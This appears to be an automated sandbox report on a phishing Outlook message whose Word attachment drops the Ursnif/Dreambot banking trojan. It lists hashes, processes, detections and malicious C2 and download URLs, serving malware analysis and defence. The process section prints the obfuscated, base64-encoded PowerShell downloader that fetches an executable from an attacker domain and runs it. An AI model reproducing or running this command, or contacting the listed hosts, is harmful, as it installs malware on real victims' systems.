analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Administrator Notification_ Redirecting email with malware.msg

Full analysis: https://app.any.run/tasks/d8f7cf15-ce18-4d3b-af17-39f6947e9035
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 21, 2019, 19:03:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
gozi
ursnif
opendir
loader
trojan
dreambot
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

1DA3A04F582F0FB42FA5D4BC10EA4EE1

SHA1:

8CBE8E500F77D0DC5CA87B1E7DC5A0F3B31FE114

SHA256:

E1A0F1CB10BABFF8DB5BB7BFEC7CB34878312852A717C241442A5C14CD7CDCD0

SSDEEP:

6144:fqOSu7lgO0PMmtGL4UDRIRT8m5MIDKYZROrNzO:fzlgO0PMmtGL4UDRIJ5TKYbOxO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • OUTLOOK.EXE (PID: 2836)
    • Executes PowerShell scripts

      • cmD.exe (PID: 2552)
    • URSNIF was detected

      • powershell.exe (PID: 3192)
      • iexplore.exe (PID: 3480)
    • Application was dropped or rewritten from another process

      • asQdSn.exe (PID: 2816)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3192)
    • Connects to CnC server

      • iexplore.exe (PID: 3480)
    • DREAMBOT was detected

      • iexplore.exe (PID: 3480)
  • SUSPICIOUS

    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 2836)
      • powershell.exe (PID: 3192)
    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 1472)
      • WINWORD.EXE (PID: 3940)
    • Application launched itself

      • WINWORD.EXE (PID: 3940)
    • Creates files in the program directory

      • powershell.exe (PID: 3192)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3192)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3940)
      • iexplore.exe (PID: 3480)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3940)
      • OUTLOOK.EXE (PID: 2836)
      • WINWORD.EXE (PID: 2312)
    • Changes internet zones settings

      • iexplore.exe (PID: 2876)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3480)
      • iexplore.exe (PID: 2876)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3480)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (58.9)
.oft | Outlook Form Template (34.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
9
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start outlook.exe winrar.exe no specs winword.exe no specs winword.exe no specs cmd.exe no specs #URSNIF powershell.exe asqdsn.exe no specs iexplore.exe #DREAMBOT iexplore.exe

Process information

PID
CMD
Path
Indicators
Parent process
2836"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Administrator Notification_ Redirecting email with malware.msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
1472"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\862AP9U8\SUEZ.zip"C:\Program Files\WinRAR\WinRAR.exeOUTLOOK.EXE
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3940"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb1472.5617\Request3.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2312"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2552cmD.exe /c P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsAIAAgAA0ACgANAAoAIAAgAGkAZgAoACQAbQAuAE4AYQBtAGUAIAAtAGUAcQAgACIARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAIgApAHsADQAKACAAIAAgACAAIAB0AHIAeQB7AA0ACgAgACAAIAAgACAAJAB1AHIAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAoACIAaAB0AHQAcAA6AC8ALwBtAGsAYQB0AGEAcgBpAG4AYQA3ADAAOQA0AG0AYQB5AGIAZQBsAGwAZQAuAGUAbQBhAGkAbAAvAGwAbwBxADkAMQAvADEAMAB4AC4AcABoAHAAPwBsAD0AdQBxAG8AZAAzAC4AagBhAGQAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABhAHMAUQBkAFMAbgAuAGUAeABlACIAOwANAAoAIAAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgALAAgACQAcgBlAHMAcABvAG4AcwBlACkAOwANAAoADQAKACAAIAAgACAAIAAkAGMAbABzAGkAZAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARwB1AGkAZAAgACcAQwAwADgAQQBGAEQAOQAwAC0ARgAyAEEAMQAtADEAMQBEADEALQA4ADQANQA1AC0AMAAwAEEAMABDADkAMQBGADMAOAA4ADAAJwANAAoAIAAgACAAIAAgACQAdAB5AHAAZQAgAD0AIABbAFQAeQBwAGUAXQA6ADoARwBlAHQAVAB5AHAAZQBGAHIAbwBtAEMATABTAEkARAAoACQAYwBsAHMAaQBkACkADQAKACAAIAAgACAAIAAkAG8AYgBqAGUAYwB0ACAAPQAgAFsAQQBjAHQAaQB2AGEAdABvAHIAXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJAB0AHkAcABlACkADQAKACAAIAAgACAAIAAkAG8AYgBqAGUAYwB0AC4ARABvAGMAdQBtAGUAbgB0AC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAkAHAAYQB0AGgALAAkAG4AdQBsACwAIAAkAG4AdQBsACwAIAAkAG4AdQBsACwAMAApAA0ACgANAAoAIAAgACAAIAAgAH0AYwBhAHQAYwBoAHsAfQANAAoAIAAgACAAIAAgAA0ACgAgACAAfQANAAoADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=C:\Windows\system32\cmD.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3192POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsAIAAgAA0ACgANAAoAIAAgAGkAZgAoACQAbQAuAE4AYQBtAGUAIAAtAGUAcQAgACIARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAIgApAHsADQAKACAAIAAgACAAIAB0AHIAeQB7AA0ACgAgACAAIAAgACAAJAB1AHIAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAoACIAaAB0AHQAcAA6AC8ALwBtAGsAYQB0AGEAcgBpAG4AYQA3ADAAOQA0AG0AYQB5AGIAZQBsAGwAZQAuAGUAbQBhAGkAbAAvAGwAbwBxADkAMQAvADEAMAB4AC4AcABoAHAAPwBsAD0AdQBxAG8AZAAzAC4AagBhAGQAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABhAHMAUQBkAFMAbgAuAGUAeABlACIAOwANAAoAIAAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgALAAgACQAcgBlAHMAcABvAG4AcwBlACkAOwANAAoADQAKACAAIAAgACAAIAAkAGMAbABzAGkAZAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARwB1AGkAZAAgACcAQwAwADgAQQBGAEQAOQAwAC0ARgAyAEEAMQAtADEAMQBEADEALQA4ADQANQA1AC0AMAAwAEEAMABDADkAMQBGADMAOAA4ADAAJwANAAoAIAAgACAAIAAgACQAdAB5AHAAZQAgAD0AIABbAFQAeQBwAGUAXQA6ADoARwBlAHQAVAB5AHAAZQBGAHIAbwBtAEMATABTAEkARAAoACQAYwBsAHMAaQBkACkADQAKACAAIAAgACAAIAAkAG8AYgBqAGUAYwB0ACAAPQAgAFsAQQBjAHQAaQB2AGEAdABvAHIAXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJAB0AHkAcABlACkADQAKACAAIAAgACAAIAAkAG8AYgBqAGUAYwB0AC4ARABvAGMAdQBtAGUAbgB0AC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAkAHAAYQB0AGgALAAkAG4AdQBsACwAIAAkAG4AdQBsACwAIAAkAG4AdQBsACwAMAApAA0ACgANAAoAIAAgACAAIAAgAH0AYwBhAHQAYwBoAHsAfQANAAoAIAAgACAAIAAgAA0ACgAgACAAfQANAAoADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2816"C:\ProgramData\asQdSn.exe" C:\ProgramData\asQdSn.exeexplorer.exe
User:
admin
Company:
Practice Velocity
Integrity Level:
MEDIUM
Description:
Patternsix
Exit code:
575
Version:
0.4.71.93
2876"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3480"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2876 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Total events
4 270
Read events
3 391
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
7
Text files
41
Unknown types
9

Dropped files

PID
Process
Filename
Type
2836OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVR707.tmp.cvr
MD5:
SHA256:
2836OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DF7CF7E6FC467271CB.TMP
MD5:
SHA256:
2836OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\862AP9U8\SUEZ (2).zip\:Zone.Identifier:$DATA
MD5:
SHA256:
2836OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8C589FA4.datimage
MD5:57B5E80641EAAE93100E732352D1FF28
SHA256:BD3FF8C30BE895C4DE8BCD264EF5629B2A63D3318234C24EB990799A8CAB4F99
2836OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:0AF3BC0C02E3C222E59B1956EE5C31F4
SHA256:1C4B480BB7F17B6AE8FB52827B1F1775F8DC4518BFB5CF2C588D2C970CE5DD8C
2836OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_5254F607E2F5A64B91EFB1D02C253E02.datxml
MD5:EEAA832C12F20DE6AAAA9C7B77626E72
SHA256:C4C9A90F2C961D9EE79CF08FBEE647ED7DE0202288E876C7BAAD00F4CA29CA16
3940WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR571B.tmp.cvr
MD5:
SHA256:
2836OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5B9ACAF9.datimage
MD5:83F43E7C7D4E8548704AB09216A6D554
SHA256:86B61888D83E11576F1315EB470D2F531E941109393935A350A9985E2F73C761
3940WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_0B624CB2-A285-4149-92E7-DD8E32B40507.0\39FD5FE9.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
2836OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_TCPrefs_2_C9C7C378EF122E43AF605DBF2DE6B3B4.datxml
MD5:F194B1FA12F9B6F46A47391FAE8BEEC2
SHA256:FCD8D7E030BE6EA7588E5C6CB568E3F1BDFC263942074B693942A27DF9521A74
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
6
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2836
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
3192
powershell.exe
GET
302
89.223.28.79:80
http://mkatarina7094maybelle.email/loq91/10x.php?l=uqod3.jad
RU
malicious
3192
powershell.exe
GET
200
104.193.252.141:80
http://j495732ay.com/loq91/10x.php?l=uqod3.jad
US
executable
1.89 Mb
malicious
2876
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
3480
iexplore.exe
GET
200
185.220.35.235:80
http://cueqb619081.company/images/WwlDdH8VyZ8jiCK/EmsctMzBpFnbnV5U_2/FgdNZYG3n/HdXkgIrIyet6Y8UCnKX7/v_2FPcl60ooZKSvepo2/se8XbxVJojwNp4ia_2Fz_2/B7mZoXzXaIM79/y5dDXNfp/k19PoiCZZxKoYVllB_2FkDt/HVQ4JWqR7tLp/L.avi
unknown
binary
20 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2876
iexplore.exe
185.220.35.235:80
cueqb619081.company
malicious
2876
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3480
iexplore.exe
185.220.35.235:80
cueqb619081.company
malicious
3192
powershell.exe
89.223.28.79:80
mkatarina7094maybelle.email
Trader soft LLC
RU
suspicious
3192
powershell.exe
104.193.252.141:80
j495732ay.com
Hosting Solution Ltd.
US
suspicious
2836
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
mkatarina7094maybelle.email
  • 89.223.28.79
malicious
j495732ay.com
  • 104.193.252.141
malicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
cueqb619081.company
  • 185.220.35.235
malicious

Threats

PID
Process
Class
Message
3192
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MalDoc Requesting Ursnif Payload
3192
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3192
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3192
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3480
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3 ETPRO signatures available at the full report
No debug info